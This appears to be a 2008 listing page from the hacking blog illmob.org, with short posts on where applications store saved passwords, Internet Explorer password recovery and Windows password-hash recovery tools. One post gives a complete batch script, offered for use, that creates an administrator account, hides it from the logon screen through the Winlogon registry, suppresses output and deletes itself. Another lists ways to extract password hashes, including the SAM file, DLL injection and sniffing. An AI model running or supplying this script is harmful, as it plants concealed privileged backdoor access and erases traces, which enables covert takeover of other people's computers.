illmob.org

Saved Password Locations

November 25th, 2008 by admin in Firefox, Password Info, Trillian, windows, Yahoo

Many people ask about the location in the Registry or file system that applications store the passwords. Here is a list of password storage locations for popular applications compiled by Nir Sofer.
Be aware that even if you know the location of the saved password, it doesn’t mean that you can move it from one computer to another. many applications store the passwords in a way that prevent you from moving them to another computer or user profile. (more…)

Create A Hidden User on XP/VISTA

October 11th, 2008 by admin in Password Info, Uncategorized, windows

Nice little .bat script trick from illwill @ illmob.org that will create user who’s account will be hidden from the logon screen and the User Accounts screen in control panel. This will only work if its ran from an account that has admin rights. It’s great for a backup account.

@echo off
rem HideUser.bat 
rem by illwill    http://illmob.org
rem This will create a hidden user with admin rights in XP/Vista
rem ( hidden meaning that the username wont appear in the logon screen)
rem change the illwill & passw0rd to your own
rem Add once you log into your new account dont forget to hide the user folder
rem "attrib +r +a +s +h %USERPROFILE%"


SET NEWUSER=adm1n
SET PASS=passw0rd

net user %NEWUSER% %PASS% /add && net localgroup administrators %NEWUSER% /add>nul 2>&1
reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v %NEWUSER% /t REG_DWORD /d 0 /f>nul 2>&1
DEL %0

Recovering Internet Explorer Passwords: Theory and Practice

July 6th, 2008 by Dev Team in News, Password Info, windows

Brief introduction on how Internet Explorer stores its passwords

(more…)

Windows Password Recovery Tools

March 13th, 2008 by Dev Team in Files, Password Info, windows

There are several ways to obtain password hashes, depending on their location and existing access. Password hashes can be obtained from SAM file or its backup, directly from local or remote computer registry, from registry or Active Directory on local or remote computer by means of DLL injection, from a network sniffer. The SAM file located in the %SystemRoot%\system32\config directory or %SystemRoot%\repair directory. It is also possible to recover the password itself from memory.

Here’s a few free tools to help you recover lost/unknown Windows passwords, most come with the source code included. (more…)